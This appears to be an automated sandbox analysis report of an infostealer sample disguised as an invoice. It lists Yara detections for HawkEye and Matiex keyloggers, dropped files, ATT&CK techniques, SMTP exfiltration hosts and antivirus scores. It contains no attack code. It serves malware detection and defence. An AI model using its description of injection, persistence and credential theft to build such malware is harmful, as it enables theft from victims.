                            Source: Yara matchFile source: 0000000A.00000002.430720019.00000000000E2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.269169616.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000000.419299258.0000000000E22000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.272090410.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.414221299.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.276618597.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.286093751.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.418225668.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.418385560.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.427152213.00000000039C1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.273140883.0000000000C32000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000000.281843308.00000000000E2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.428390015.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.681903640.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.284634932.0000000003E4D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.419784850.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.413803172.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.424187770.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.271788096.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.283633869.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: origigoods40.exe PID: 6172, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, type: DROPPED
                            Source: Yara matchFile source: 7.0.origigoods40.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.origigoods40.exe.e20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.2.origigoods20.exe.720000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.0.origigoods20.exe.e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.origigoods20.exe.e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.0.origigoods40.exe.e20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.origigoods40.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.0.origigoods20.exe.720000.0.unpack, type: UNPACKEDPE
                            Yara detected HawkEye KeyloggerShow sources
                            Source: Yara matchFile source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara matchFile source: dropped/hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Yara detected Matiex KeyloggerShow sources
                            Source: Yara matchFile source: 00000008.00000002.681623451.0000000000F72000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001E.00000002.681849072.0000000000BD2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                            Source: Yara matchFile source: 8.2.Matiexgoods.exe.f70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.0.Matiexgoods.exe.bd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.Matiexgoods.exe.f9277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.2.Matiexgoods.exe.bd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Matiexgoods.exe.f9277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.Matiexgoods.exe.f70000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.2.Matiexgoods.exe.bf277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 30.0.Matiexgoods.exe.bf277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B60E9E bind,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B60A8E listen,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B60E6B bind,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: 6_2_04B60A50 listen,

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Replication Through Removable Media1Windows Management Instrumentation231Startup Items1Startup Items1Disable or Modify Tools211OS Credential Dumping2Peripheral Device Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default AccountsNative API2DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information11Input Capture211File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain AccountsShared Modules1Registry Run Keys / Startup Folder12Access Token Manipulation1Obfuscated Files or Information41Credentials in Registry2System Information Discovery126SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Process Injection411Software Packing13Credentials In Files1Query Registry1Distributed Component Object ModelInput Capture211Scheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsPowerShell2Network Logon ScriptRegistry Run Keys / Startup Folder12DLL Side-Loading1LSA SecretsSecurity Software Discovery251SSHClipboard Data1Data Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion16VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol23Jamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion16DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection411/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 347154 Sample: PO_Invoices_pdf.exe Startdate: 02/02/2021 Architecture: WINDOWS Score: 100 90 smtp.privateemail.com 2->90 106 Found malware configuration 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 Sigma detected: Capture Wi-Fi password 2->110 112 20 other signatures 2->112 10 PO_Invoices_pdf.exe 3 2->10         started        14 I$s#$lT3ssl.exe 2->14         started        signatures3 process4 file5 88 C:\Users\user\...\PO_Invoices_pdf.exe.log, ASCII 10->88 dropped 118 Writes to foreign memory regions 10->118 120 Allocates memory in foreign processes 10->120 122 Injects a PE file into a foreign processes 10->122 16 RegAsm.exe 5 10->16         started        19 powershell.exe 16 10->19         started        22 RegAsm.exe 14->22         started        24 powershell.exe 14->24         started        signatures6 process7 file8 68 C:\Users\user\AppData\...\origigoods40.exe, PE32 16->68 dropped 70 C:\Users\user\AppData\...\origigoods20.exe, PE32 16->70 dropped 72 C:\Users\user\AppData\...\Matiexgoods.exe, PE32 16->72 dropped 26 hawkgoods.exe 15 6 16->26         started        30 Matiexgoods.exe 16->30         started        32 origigoods20.exe 16->32         started        34 origigoods40.exe 2 16->34         started        74 C:\Users\user\AppData\...\I$s#$lT3ssl.exe, PE32 19->74 dropped 76 C:\Users\...\I$s#$lT3ssl.exe:Zone.Identifier, ASCII 19->76 dropped 114 Drops PE files to the startup folder 19->114 116 Powershell drops PE file 19->116 36 conhost.exe 19->36         started        78 C:\Users\user\AppData\Local\...\hawkgoods.exe, PE32 22->78 dropped 38 hawkgoods.exe 22->38         started        40 origigoods20.exe 22->40         started        44 2 other processes 22->44 42 conhost.exe 24->42         started        signatures9 process10 dnsIp11 102 3 other IPs or domains 26->102 124 Antivirus detection for dropped file 26->124 126 Multi AV Scanner detection for dropped file 26->126 128 Machine Learning detection for dropped file 26->128 146 3 other signatures 26->146 46 vbc.exe 26->46         started        49 dw20.exe 26->49         started        52 WerFault.exe 26->52         started        54 vbc.exe 26->54         started        92 checkip.dyndns.org 30->92 104 2 other IPs or domains 30->104 130 Tries to steal Mail credentials (via file access) 30->130 132 Tries to harvest and steal browser information (history, passwords, etc) 30->132 134 Tries to harvest and steal WLAN passwords 30->134 56 netsh.exe 30->56         started        94 smtp.privateemail.com 199.193.7.228, 49740, 49741, 49742 NAMECHEAP-NETUS United States 32->94 136 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 32->136 138 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 32->138 140 Found evasive API chain (trying to detect sleep duration tampering with parallel thread) 32->140 96 69.170.12.0.in-addr.arpa 38->96 148 3 other signatures 38->148 58 vbc.exe 38->58         started        60 vbc.exe 38->60         started        62 dw20.exe 38->62         started        64 WerFault.exe 38->64         started        142 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 40->142 144 Tries to harvest and steal ftp login credentials 40->144 98 checkip.dyndns.org 44->98 100 216.146.43.70, 49777, 49779, 49787 DYNDNSUS United States 44->100 signatures12 process13 file14 150 Tries to steal Instant Messenger accounts or passwords 46->150 152 Tries to steal Mail credentials (via file access) 46->152 80 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 49->80 dropped 82 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 52->82 dropped 66 conhost.exe 56->66         started        154 Tries to harvest and steal browser information (history, passwords, etc) 60->154 84 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 62->84 dropped 86 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 64->86 dropped signatures15 process16

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            PO_Invoices_pdf.exe18%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                            PO_Invoices_pdf.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\origigoods40.exe100%AviraTR/Spy.Gen8
                            C:\Users\user\AppData\Local\Temp\hawkgoods.exe100%AviraTR/AD.MExecute.lzrac
                            C:\Users\user\AppData\Local\Temp\hawkgoods.exe100%AviraSPR/Tool.MailPassView.473
                            C:\Users\user\AppData\Local\Temp\origigoods20.exe100%AviraTR/Spy.Gen8
                            C:\Users\user\AppData\Local\Temp\Matiexgoods.exe100%AviraTR/Redcap.jajcu
                            C:\Users\user\AppData\Local\Temp\origigoods40.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\hawkgoods.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\origigoods20.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Matiexgoods.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Matiexgoods.exe46%MetadefenderBrowse
                            C:\Users\user\AppData\Local\Temp\Matiexgoods.exe89%ReversingLabsByteCode-MSIL.Trojan.MatiexKeylogger
                            C:\Users\user\AppData\Local\Temp\hawkgoods.exe96%ReversingLabsByteCode-MSIL.Trojan.Golroted
                            C:\Users\user\AppData\Local\Temp\origigoods20.exe43%MetadefenderBrowse
                            C:\Users\user\AppData\Local\Temp\origigoods20.exe86%ReversingLabsByteCode-MSIL.Infostealer.DarkStealer
                            C:\Users\user\AppData\Local\Temp\origigoods40.exe43%MetadefenderBrowse
                            C:\Users\user\AppData\Local\Temp\origigoods40.exe82%ReversingLabsByteCode-MSIL.Infostealer.DarkStealer
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe20%ReversingLabsByteCode-MSIL.Trojan.Pwsx

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            7.0.origigoods40.exe.c30000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                            30.0.Matiexgoods.exe.bd0000.0.unpack100%AviraTR/Redcap.jajcuDownload File
                            8.2.Matiexgoods.exe.f70000.0.unpack100%AviraTR/Redcap.jajcuDownload File
                            28.2.origigoods40.exe.e20000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                            31.2.origigoods20.exe.720000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                            10.0.origigoods20.exe.e0000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                            10.2.origigoods20.exe.e0000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                            27.2.hawkgoods.exe.a40000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                            27.2.hawkgoods.exe.a40000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                            6.0.hawkgoods.exe.2f0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                            6.0.hawkgoods.exe.2f0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                            30.2.Matiexgoods.exe.bd0000.0.unpack100%AviraTR/Redcap.jajcuDownload File
                            26.2.RegAsm.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                            26.2.RegAsm.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                            26.2.RegAsm.exe.400000.0.unpack100%AviraTR/Redcap.jajcuDownload File
                            26.2.RegAsm.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                            26.2.RegAsm.exe.4031bf.2.unpack100%AviraTR/Inject.vcoldiDownload File
                            8.0.Matiexgoods.exe.f70000.0.unpack100%AviraTR/Redcap.jajcuDownload File
                            5.2.RegAsm.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                            5.2.RegAsm.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                            5.2.RegAsm.exe.400000.0.unpack100%AviraTR/Redcap.jajcuDownload File
                            5.2.RegAsm.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                            6.2.hawkgoods.exe.2f0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                            6.2.hawkgoods.exe.2f0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                            28.0.origigoods40.exe.e20000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                            23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack100%AviraTR/Inject.vcoldiDownload File
                            7.2.origigoods40.exe.c30000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                            31.0.origigoods20.exe.720000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                            27.0.hawkgoods.exe.a40000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                            27.0.hawkgoods.exe.a40000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                            0.2.PO_Invoices_pdf.exe.4396d80.5.unpack100%AviraTR/Inject.vcoldiDownload File
                            5.2.RegAsm.exe.4031bf.1.unpack100%AviraTR/Inject.vcoldiDownload File
                            35.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                            18.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                            0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack100%AviraTR/Inject.vcoldiDownload File
                            23.2.I$s#$lT3ssl.exe.4156d80.4.unpack100%AviraTR/Inject.vcoldiDownload File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                            http://www.zhongyicts.com.cnaN0%Avira URL Cloudsafe
                            http://ocsp.sectigo.com00%URL Reputationsafe
                            http://ocsp.sectigo.com00%URL Reputationsafe
                            http://ocsp.sectigo.com00%URL Reputationsafe
                            http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
                            http://www.founder.com.cn/cnR0%Avira URL Cloudsafe
                            https://contoso.com/License0%URL Reputationsafe
                            https://contoso.com/License0%URL Reputationsafe
                            https://contoso.com/License0%URL Reputationsafe
                            http://www.founder.com.cn/cnT0%Avira URL Cloudsafe
                            http://www.tiro.com0%URL Reputationsafe
                            http://www.tiro.com0%URL Reputationsafe
                            http://www.tiro.com0%URL Reputationsafe
                            http://ns.adobe.c/g0%URL Reputationsafe
                            http://ns.adobe.c/g0%URL Reputationsafe
                            http://ns.adobe.c/g0%URL Reputationsafe
                            http://www.goodfont.co.kr0%URL Reputationsafe
                            http://www.goodfont.co.kr0%URL Reputationsafe
                            http://www.goodfont.co.kr0%URL Reputationsafe
                            http://www.carterandcone.com0%URL Reputationsafe
                            http://www.carterandcone.com0%URL Reputationsafe
                            http://www.carterandcone.com0%URL Reputationsafe
                            http://www.sajatypeworks.com0%URL Reputationsafe
                            http://www.sajatypeworks.com0%URL Reputationsafe
                            http://www.sajatypeworks.com0%URL Reputationsafe
                            http://csARxe.com0%Avira URL Cloudsafe
                            http://www.typography.netD0%URL Reputationsafe
                            http://www.typography.netD0%URL Reputationsafe
                            http://www.typography.netD0%URL Reputationsafe
                            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                            http://fontfabrik.com0%URL Reputationsafe
                            http://fontfabrik.com0%URL Reputationsafe
                            http://fontfabrik.com0%URL Reputationsafe
                            http://www.typography.net-siu0%Avira URL Cloudsafe
                            http://checkip.dyndns.org/0%Avira URL Cloudsafe
                            http://www.typography.net0%URL Reputationsafe
                            http://www.typography.net0%URL Reputationsafe
                            http://www.typography.net0%URL Reputationsafe
                            https://contoso.com/0%URL Reputationsafe
                            https://contoso.com/0%URL Reputationsafe
                            https://contoso.com/0%URL Reputationsafe
                            https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/0%URL Reputationsafe
                            https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/0%URL Reputationsafe
                            https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/0%URL Reputationsafe
                            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                            https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                            https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                            https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                            http://www.sandoll.co.kr0%URL Reputationsafe
                            http://www.sandoll.co.kr0%URL Reputationsafe
